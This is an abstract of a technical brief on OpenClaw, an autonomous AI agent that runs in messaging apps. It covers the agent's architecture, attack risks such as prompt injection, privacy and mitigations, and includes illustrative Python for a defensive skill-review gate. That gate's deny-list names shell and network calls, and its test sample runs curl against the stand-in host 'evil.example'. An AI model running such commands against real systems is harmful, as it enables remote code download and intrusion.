OpenClaw AI: Security Risks and Architecture, by Anupam Tiwari
1. As autonomous AI agents move from research labs into everyday messaging apps, the policy and security implications are no longer theoretical. OpenClaw AI, originally released as Clawdbot in November 2025 and now viral globally under the nickname "raising a lobster", represents a new class of personal AI: self-hosted, messaging-native, and capable of executing real-world tasks with minimal human oversight.
2. This 20-slide technical brief is prepared for think tanks, policy researchers, and academic audiences seeking a grounded, non-hype understanding of what OpenClaw is, how it works under the hood, and what risks it carries.
What this brief covers:
- Architecture: A layered breakdown of OpenClaw's five-tier design — from messaging bridge (Baileys, Telethon) through Agent Core, LLM inference routing, and tool execution — including a step-by-step data flow tracing a single user message through the full system.
- Security Risks: Ten documented risks rated by severity, likelihood, and exploitability — including prompt injection (Critical), session credential hijacking (Critical), skill script code execution (High), supply chain attacks, lateral movement via messaging, and local file system exposure. Each risk includes a realistic attack example.
- Privacy Analysis: LLM API data exposure, GDPR cross-border transfer implications, contact graph profiling, metadata accumulation, and the legal grey zone of running automated agents on platforms like WhatsApp and Telegram.
- Mitigations & Isolation Playbook: Actionable guidance including dedicated SIM/account isolation, Docker sandboxing, outbound firewall whitelisting, API key hygiene, and skill script review gates — all implementable today.
- Research Frontiers: Open academic questions across agentic AI safety, privacy-preserving LLM inference, human-agent interaction, and platform governance.
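The five-tier data flow described in the Architecture bullet can be sketched as a simple pipeline. This is an illustrative mock, not OpenClaw's actual API: every class, function, and payload field below is a hypothetical stand-in for the layers named above (messaging bridge, Agent Core, LLM inference routing, tool execution, reply path).

```python
# Hypothetical sketch of OpenClaw's five-tier message flow. All names are
# illustrative assumptions, not OpenClaw's real interfaces.

from dataclasses import dataclass

@dataclass
class InboundMessage:
    sender: str
    text: str

def bridge_receive(raw: dict) -> InboundMessage:
    """Tier 1: the messaging bridge normalises a platform event
    (e.g. a Baileys/Telethon payload) into an internal message."""
    return InboundMessage(sender=raw["from"], text=raw["body"])

def agent_core(msg: InboundMessage) -> str:
    """Tier 2: the Agent Core assembles prompt context for the model."""
    return f"User {msg.sender} says: {msg.text}"

def llm_route(prompt: str) -> str:
    """Tier 3: inference routing selects a backend; stubbed here with a
    canned response that requests a tool call."""
    return "TOOL:echo " + prompt

def tool_execute(model_output: str) -> str:
    """Tier 4: the tool execution layer runs the requested action
    (sandboxed in a real deployment)."""
    if model_output.startswith("TOOL:echo "):
        return model_output[len("TOOL:echo "):]
    return model_output

def handle(raw: dict) -> str:
    """Tier 5: the reply travels back through the bridge to the user."""
    return tool_execute(llm_route(agent_core(bridge_receive(raw))))

print(handle({"from": "+441234", "body": "what's on my calendar?"}))
```

Tracing one message through `handle` mirrors the step-by-step data flow the brief promises: normalise, contextualise, route, execute, reply.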
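The "skill script review gate" mitigation above can be sketched as a minimal static pre-check that runs before any skill is installed. This is a toy sketch under stated assumptions: the pattern list and function names are hypothetical, and a production gate would use AST analysis plus human review rather than substring matching.

```python
# Hypothetical skill-script review gate: flag risky constructs in a skill
# before it is allowed to run. Patterns and names are illustrative only.

import re

# Assumed deny-list of patterns worth escalating to a human reviewer.
SUSPICIOUS_PATTERNS = [
    r"\bos\.system\b",          # shelling out
    r"\bsubprocess\b",          # process spawning
    r"\beval\(",                # dynamic code execution
    r"\bexec\(",
    r"requests\.(get|post)\(",  # unexpected outbound network calls
]

def review_skill(source: str) -> list[str]:
    """Return the patterns found in the skill source.
    An empty list means the script may proceed to human review."""
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, source)]

safe_skill = "def greet(name):\n    return 'hello ' + name\n"
risky_skill = "import subprocess\nsubprocess.run(['curl', 'evil.example'])\n"

print(review_skill(safe_skill))
print(review_skill(risky_skill))
```

A gate like this is deliberately conservative: it cannot prove a skill safe, only surface the cases that clearly warrant inspection before execution.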
This is not a product review or a user guide. It is a structured technical and policy document for those who need to understand agentic AI at a systems level — before deployment decisions, regulatory responses, or research agendas are set.
Relevant audiences: AI policy analysts, cybersecurity researchers, academic institutions studying HCI and agentic systems, corporate risk and compliance teams, and journalists covering the AI governance space.
https://orcid.org/0000-0002-9097-2246




